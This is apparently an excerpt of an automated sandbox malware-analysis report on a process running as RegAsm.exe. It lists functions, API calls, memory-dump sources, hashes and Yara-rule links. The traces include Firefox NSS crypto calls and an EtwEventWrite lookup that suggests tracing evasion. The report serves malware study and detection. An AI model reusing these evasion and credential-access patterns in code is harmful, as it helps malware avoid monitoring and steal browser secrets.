                                                                                                        Function 6C1C8850 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C1D0715), ref: 6C1C8859
                                                                                                        • PR_NewLock.NSS3 ref: 6C1C8874
                                                                                                          • Part of subcall function 6C2798D0: calloc.MOZGLUE(00000001,00000084,6C1A0936,00000001,?,6C1A102C), ref: 6C2798E5
                                                                                                        • PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C1C888D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: calloc$ArenaInitLockPool
                                                                                                        • String ID: NSS
                                                                                                        • API String ID: 2230817933-3870390017
                                                                                                        • Opcode ID: f2237f4efa12f9271bfe9c5de664524527b0261b571f1f1574e0fd8a6ec3bcb4
                                                                                                        • Instruction ID: f551a485459bdcfa02c48482a7b032f46a9f6c07cc82bb32d8040f659b68839f
                                                                                                        • Opcode Fuzzy Hash: f2237f4efa12f9271bfe9c5de664524527b0261b571f1f1574e0fd8a6ec3bcb4
                                                                                                        • Instruction Fuzzy Hash: A6F09666F8162423F61022696C46B8675989F7575EF050032FD0CA7F82EB59D528C3F3
                                                                                                        Function 6C25A890 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PK11_FreeSymKey.NSS3(?,00000000,?,6C245F25,?,?,?,?,?,?,?,?,?,6C24AAD4), ref: 6C25A8A3
                                                                                                          • Part of subcall function 6C1FADC0: TlsGetValue.KERNEL32(?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE10
                                                                                                          • Part of subcall function 6C1FADC0: EnterCriticalSection.KERNEL32(?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE24
                                                                                                          • Part of subcall function 6C1FADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C1DD079,00000000,00000001), ref: 6C1FAE5A
                                                                                                          • Part of subcall function 6C1FADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE6F
                                                                                                          • Part of subcall function 6C1FADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE7F
                                                                                                          • Part of subcall function 6C1FADC0: TlsGetValue.KERNEL32(?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAEB1
                                                                                                          • Part of subcall function 6C1FADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAEC9
                                                                                                        • PK11_FreeSymKey.NSS3(?,00000000,?,6C245F25,?,?,?,?,?,?,?,?,?,6C24AAD4), ref: 6C25A8BA
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(%_$l,00000000,00000000,?,6C245F25,?,?,?,?,?,?,?,?,?,6C24AAD4), ref: 6C25A8CF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterFreeK11_SectionValue$Item_UnlockUtilZfreefreememset
                                                                                                        • String ID: %_$l
                                                                                                        • API String ID: 2877228265-1688479048
                                                                                                        • Opcode ID: f7ecba68643641a6e5e9984d78e7c401f2e1820bb68a1c2ae286aab2ab8f52ab
                                                                                                        • Instruction ID: bb5d03d328f1c592d4fb1b1c84c88c775385b980906615fb22cd93e7bf64e7ca
                                                                                                        • Opcode Fuzzy Hash: f7ecba68643641a6e5e9984d78e7c401f2e1820bb68a1c2ae286aab2ab8f52ab
                                                                                                        • Instruction Fuzzy Hash: 14F0A0B2A01B1997EB109A15E806BA373DC9B0065EF448029EC2A97B01E335E81587F1
                                                                                                        Function 0040F27D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0040F282
                                                                                                          • Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC0D
                                                                                                          • Part of subcall function 0042EBF8: __CxxThrowException@8.LIBCMT ref: 0042EC22
                                                                                                          • Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC33
                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0040F28D
                                                                                                          • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
                                                                                                          • Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
                                                                                                          • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 1823113695-4289949731
                                                                                                        • Opcode ID: 941df7bd290407a9ef689aa40561f47c5295f4f3ec763d10fe6edd7e59272ef7
                                                                                                        • Instruction ID: e6539817a9f8634559db26b0b382dc9566da10c2029d1fc652b1cb6cacdddcbf
                                                                                                        • Opcode Fuzzy Hash: 941df7bd290407a9ef689aa40561f47c5295f4f3ec763d10fe6edd7e59272ef7
                                                                                                        • Instruction Fuzzy Hash: 55D012B5A4020C7BCB04E79AE816ACDBAE99B58714F20016FB616D3641EAB8A6004569
                                                                                                        Function 00411D61 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00412301,?), ref: 00411D6C
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00411D73
                                                                                                        • wsprintfW.USER32 ref: 00411D84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocProcesswsprintf
                                                                                                        • String ID: %hs
                                                                                                        • API String ID: 659108358-2783943728
                                                                                                        • Opcode ID: 3ad6661e342435e3454c6033efd35680c758cdf589e793b7d7a2c9c560a2e302
                                                                                                        • Instruction ID: 516a0af99a9d3ed9a850d6bfca40a0a85ae49b58000b6b42a5d70a6c01262027
                                                                                                        • Opcode Fuzzy Hash: 3ad6661e342435e3454c6033efd35680c758cdf589e793b7d7a2c9c560a2e302
                                                                                                        • Instruction Fuzzy Hash: F2D0A73134031477C61027D4BC0DF9A3F2CDB067A2F001130FA0DD6151C96548144BDD
                                                                                                        Function 004013F6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00401402
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040140D
                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00401416
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CapsCreateDeviceRelease
                                                                                                        • String ID: DISPLAY
                                                                                                        • API String ID: 1843228801-865373369
                                                                                                        • Opcode ID: cf640d80628ad4e74f3d38171acba973207c28ae387d92be87cd61cc0b75c439
                                                                                                        • Instruction ID: 9bbdd1ee4896165f6ac39e3e5efd8c25d27bca58a6bb0b57e2a538c7cae0429d
                                                                                                        • Opcode Fuzzy Hash: cf640d80628ad4e74f3d38171acba973207c28ae387d92be87cd61cc0b75c439
                                                                                                        • Instruction Fuzzy Hash: C9D012353C030477E1781B50BC5FF1A2934D7C5F02F201124F312580D046A41402963E
                                                                                                        Function 004018B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 004018BA
                                                                                                        • GetProcAddress.KERNEL32(00000000,EtwEventWrite), ref: 004018CB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: EtwEventWrite$ntdll.dll
                                                                                                        • API String ID: 1646373207-1851843765
                                                                                                        • Opcode ID: e7173cbc659f646d90c6637380379b2e67bafee961351022300d75924a4236c6
                                                                                                        • Instruction ID: fa0301676ac4a0b35d6f0bad7f9db5a069fcd374a286a1e4a3065c0da922a8bc
                                                                                                        • Opcode Fuzzy Hash: e7173cbc659f646d90c6637380379b2e67bafee961351022300d75924a4236c6
                                                                                                        • Instruction Fuzzy Hash: 84B09B7078020097CD1467756D5DF07766566457027506165A645D0160D77C5514551D
                                                                                                        Function 6C0E0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C0E0CD5
                                                                                                          • Part of subcall function 6C0CF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C0CF9A7
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C0E0D40
                                                                                                        • free.MOZGLUE ref: 6C0E0DCB
                                                                                                          • Part of subcall function 6C0B5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C0B5EDB
                                                                                                          • Part of subcall function 6C0B5E90: memset.VCRUNTIME140(6C0F7765,000000E5,55CCCCCC), ref: 6C0B5F27
                                                                                                          • Part of subcall function 6C0B5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C0B5FB2
                                                                                                        • free.MOZGLUE ref: 6C0E0DDD
                                                                                                        • free.MOZGLUE ref: 6C0E0DF2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 4069420150-0
                                                                                                        • Opcode ID: 1d7485f7527ebc4b9341e948fd6690ca3d7e3ae536b22a0610d6c5df0357fefc
                                                                                                        • Instruction ID: ec3f50897c36832e9f3c9f90e2e691f2546234dff252fc74555fa8f5c348dd3e
                                                                                                        • Opcode Fuzzy Hash: 1d7485f7527ebc4b9341e948fd6690ca3d7e3ae536b22a0610d6c5df0357fefc
                                                                                                        • Instruction Fuzzy Hash: BB411675A0C7808BD720CF29C08079EFBE5BFC9658F508A2EE8D887710DB70A445DB82
                                                                                                        Function 6C0B5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetTickCount64.KERNEL32 ref: 6C0B5D40
                                                                                                        • EnterCriticalSection.KERNEL32(6C11F688), ref: 6C0B5D67
                                                                                                        • __aulldiv.LIBCMT ref: 6C0B5DB4
                                                                                                        • LeaveCriticalSection.KERNEL32(6C11F688), ref: 6C0B5DED
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                        • String ID:
                                                                                                        • API String ID: 557828605-0
                                                                                                        • Opcode ID: b729f244885ca89926955f935959956660e0f8cb4b1a44528d35f70b90f2b7f2
                                                                                                        • Instruction ID: 927e2ba09d390ebd1029d9525963635b409e175d4c158c7d215e69b5ced83e97
                                                                                                        • Opcode Fuzzy Hash: b729f244885ca89926955f935959956660e0f8cb4b1a44528d35f70b90f2b7f2
                                                                                                        • Instruction Fuzzy Hash: BD518F75E002198FCF08CFA8C955BAEBBF2FB89304F194669C825B7B50C7756946CB90
                                                                                                        Function 6C274FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C1585D2,00000000,?,?), ref: 6C274FFD
                                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C27500C
                                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2750C8
                                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2750D6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _byteswap_ulong
                                                                                                        • String ID:
                                                                                                        • API String ID: 4101233201-0
                                                                                                        • Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
                                                                                                        • Instruction ID: 9ba9781447f1709eca63512baa3f9523417b70143f778a8e5530cdac23856510
                                                                                                        • Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
                                                                                                        • Instruction Fuzzy Hash: 97415CB2A406158BCB18CF18DCD179AB7E1BF4831871D466DD84ACBB02E779E891CB91
                                                                                                        Function 6C2CA860 Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C2CA690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6C2CA662), ref: 6C2CA69E
                                                                                                          • Part of subcall function 6C2CA690: PR_NewCondVar.NSS3(?), ref: 6C2CA6B4
                                                                                                        • PR_IntervalNow.NSS3 ref: 6C2CA8C6
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C2CA8EB
                                                                                                        • _PR_MD_UNLOCK.NSS3(?), ref: 6C2CA944
                                                                                                        • PR_SetPollableEvent.NSS3(?), ref: 6C2CA94F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 811965633-0
                                                                                                        • Opcode ID: 4afd92a6d81373af173518ca6e06b2d42abb8092bd01f3a52850c50ae1921de2
                                                                                                        • Instruction ID: 8a8c8509422558a8dbcea472232ee1c918ad53a115255962803baba38b92317d
                                                                                                        • Opcode Fuzzy Hash: 4afd92a6d81373af173518ca6e06b2d42abb8092bd01f3a52850c50ae1921de2
                                                                                                        • Instruction Fuzzy Hash: 3B4158B4A01A0ACFC794CF29C5C0956FBF5FF48318724862AE85ACBB11E731E850CB91
                                                                                                        Function 6C1B6C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C1B6C8D
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C1B6CA9
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C1B6CC0
                                                                                                        • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C2D8FE0), ref: 6C1B6CFE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 2370200771-0
                                                                                                        • Opcode ID: 3beb5ddf007af8162880510fd7ea450901cae14a6d63084ae24e15ab1691bea1
                                                                                                        • Instruction ID: 3a7b591d744aec46aecee65dfc387afd8111bc24ff094ecb8ecc3ac716349676
                                                                                                        • Opcode Fuzzy Hash: 3beb5ddf007af8162880510fd7ea450901cae14a6d63084ae24e15ab1691bea1
                                                                                                        • Instruction Fuzzy Hash: 853190B1A0021A9FEB08CF65C891ABFBBF5EF65248F14453DD945E7700EB35A905CBA0
                                                                                                        Function 6C2C4F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C2C4F5D
                                                                                                        • free.MOZGLUE(?), ref: 6C2C4F74
                                                                                                        • free.MOZGLUE(?), ref: 6C2C4F82
                                                                                                        • GetLastError.KERNEL32 ref: 6C2C4F90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$CreateErrorFileLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 17951984-0
                                                                                                        • Opcode ID: 98a4f544c7e18064b42e1ae5fc43b5a0cbb6e3fa461e29e38139e9a9f7cf68f6
                                                                                                        • Instruction ID: 781195e8ea3e6cda198d0ab9d04572f6a137be26c374da1679d680c05911be14
                                                                                                        • Opcode Fuzzy Hash: 98a4f544c7e18064b42e1ae5fc43b5a0cbb6e3fa461e29e38139e9a9f7cf68f6
